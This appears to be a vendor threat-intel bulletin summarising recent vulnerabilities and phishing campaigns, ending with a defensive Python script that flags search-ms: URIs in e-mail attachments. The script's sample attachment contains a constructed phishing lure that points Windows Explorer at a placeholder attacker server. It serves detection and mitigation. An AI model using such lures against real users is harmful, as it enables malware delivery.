Contents
01. News Bites
- Patch released for exploited zero-day on Google Pixel devices
- Progressive Web Apps utilised by new phishing toolkit
- Microsoft delays Windows Recall feature
- Windows zero-day exploited by Black Basta ransomware group
- Windows search protocol exploited in phishing campaign
02. Conclusion
Patch released for exploited zero-day on Google Pixel devices
Google has patched a high-severity zero-day vulnerability, CVE-2024-32896, on Pixel devices; Google's advisory says there are indications that the flaw is under limited, targeted exploitation. It is an elevation of privilege issue and is fixed in the June 2024 Pixel update (Android 14 QPR3); Google says other Android devices will receive the fix in future updates. The same update resolves 49 other security issues, including critical privilege escalation bugs. Pixel users should install the update promptly and confirm that the Android security patch level shown under Settings > About phone is June 2024 or later.
Progressive Web Apps utilised by new phishing toolkit
A new phishing toolkit uses Progressive Web Apps (PWAs) to present convincing fake login forms that harvest credentials. Built by the security researcher known as mr.d0x, it relies on the fact that an installed PWA runs in a standalone window without the browser's own address bar, so the page can draw a fake address bar, padlock included, that displays whatever legitimate URL the attacker chooses. Victims are lured into installing the malicious PWA, which then asks for their credentials. Because the installed app sits alongside native applications in the operating system, the usual advice of checking the URL in the address bar does not help here: the only reliable indicators are the browser's real UI, which standalone mode removes, and the browser's list of installed web apps (for example chrome://apps or edge://apps), which should be reviewed for anything unexpected.
Microsoft delays Windows Recall feature
Microsoft has postponed the release of its AI-powered Windows Recall feature in response to privacy and security concerns. Originally due to ship on 18 June with Copilot+ PCs, it will first go through further testing in the Windows Insider Program. Recall takes periodic snapshots of the screen, indexes them with on-device models and lets the user search that history; privacy advocates and security researchers warned that a searchable archive of everything shown on screen is an attractive target for data theft if malware, or another user of the machine, can reach it. Microsoft has committed to strengthening the feature's security controls before a broader release.
Windows zero-day exploited by Black Basta ransomware group
The Black Basta ransomware gang has been linked to attacks exploiting CVE-2024-26169, a high-severity elevation of privilege vulnerability in the Windows Error Reporting Service that lets a local attacker gain SYSTEM privileges. Microsoft patched the flaw in March 2024. Symantec reports that an exploit tool for it was deployed shortly after initial infections by the DarkGate loader, and that the tool's compilation timestamps predate the fix, which suggests it was used as a zero-day, with the caveat that such timestamps can be forged. The case illustrates both the group's capability and the need to apply cumulative updates promptly: hosts still missing the March 2024 (or a later) Windows cumulative update remain exposed to a weaponised privilege escalation.
Windows search protocol exploited in phishing campaign
A recent phishing campaign abuses the Windows search protocol (search-ms: URIs) to deliver malicious scripts. The e-mails carry HTML attachments that, when opened, redirect the browser to a search-ms: URI; once the user accepts the browser's prompt to open Windows Explorer, Explorer runs a search whose location (the crumb parameter) points at an attacker-controlled remote server, typically a file share reached over SMB or WebDAV, so the results window lists files served from that server. The files are disguised as invoices and, when double-clicked, run batch scripts that can install malware. Mitigations: treat unexpected HTML attachments as hostile and block or sandbox them at the mail gateway; consider disabling the search-ms: handler by exporting and then deleting the HKEY_CLASSES_ROOT\search-ms registry key (importing the export restores it); and block outbound SMB (TCP 445) at the perimeter, bearing in mind that UNC paths fall back to WebDAV over HTTP(S) if the WebClient service is running.
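The following Python script is an added example for this bulletin, not code from the campaign or from Integrity360. It shows how a mail-gateway or triage script can flag HTML attachments of this kind: it extracts every search-ms: URI, parses the query, crumb and displayname parameters, and reports whether the crumb location points off the host. The sample attachment is constructed for the example, with 203.0.113.10 as a placeholder for an attacker-controlled server; the two lure forms it contains (a meta refresh and a plain link) are assumptions about how such an attachment might be written.

```python
"""Flag search-ms: URIs in HTML e-mail attachments whose search location is remote.

Added example for this bulletin; not code from the campaign or from Integrity360.
"""
import html
import re
from urllib.parse import unquote

# Constructed sample attachment (not a real phishing sample). 203.0.113.10 is a
# documentation address standing in for an attacker-controlled server; the
# "\\server@443\share" form is the UNC spelling of a WebDAV-over-HTTPS location.
SAMPLE_ATTACHMENT = r"""<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=INVOICE&amp;crumb=location:%5C%5C203.0.113.10%40443%5Cshare&amp;displayname=Downloads">
</head><body>
<p>Your invoice is attached.</p>
<a href="search-ms:query=Invoice&crumb=location:\\203.0.113.10\share&displayname=Downloads">Open invoice</a>
<a href="https://example.com/invoice.pdf">Download PDF</a>
</body></html>"""

# A search-ms: URI embedded in HTML ends at whitespace, a quote or an angle bracket.
SEARCH_MS_RE = re.compile(r"search-ms:[^\s\"'<>]+", re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into its parameters and pull the location out of the crumb."""
    params = {}
    for part in uri.split(":", 1)[1].split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.strip().lower()] = unquote(value)  # undo %5C-style encoding
    crumb = params.get("crumb", "")
    location = crumb[len("location:"):] if crumb.lower().startswith("location:") else None
    return {
        "uri": uri,
        "query": params.get("query"),
        "displayname": params.get("displayname"),  # title shown on the Explorer window
        "location": location,
    }


def is_remote_location(location) -> bool:
    """True for UNC paths and HTTP(S)/WebDAV URLs, i.e. locations outside the local machine."""
    if not location:
        return False
    loc = location.strip().lower()
    return loc.startswith(("\\\\", "//", "http://", "https://"))


def find_search_ms_uris(content: str) -> list:
    """Return every search-ms: URI in an HTML document, with parsed fields and a remote flag."""
    findings = []
    # Decode HTML entities (&amp; etc.) first so parameters split on real ampersands.
    for match in SEARCH_MS_RE.finditer(html.unescape(content)):
        entry = parse_search_ms(match.group(0))
        entry["remote"] = is_remote_location(entry["location"])
        findings.append(entry)
    return findings


def verdict(content: str) -> str:
    """One-line triage verdict for an attachment."""
    findings = find_search_ms_uris(content)
    if not findings:
        return "clean: no search-ms URIs"
    remote = [f for f in findings if f["remote"]]
    if remote:
        return f"suspicious: {len(remote)} search-ms URI(s) searching remote location(s)"
    return f"review: {len(findings)} search-ms URI(s) with local or unspecified location"


if __name__ == "__main__":
    for finding in find_search_ms_uris(SAMPLE_ATTACHMENT):
        print(finding)
    print(verdict(SAMPLE_ATTACHMENT))
```

The remote check is the discriminating signal: a search-ms: URI whose crumb points at a UNC path or URL makes Explorer fetch its listing from a server the sender controls, which legitimate mail has no reason to do. A local or absent location is worth a look but is not by itself malicious.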
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.
Disclaimer
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.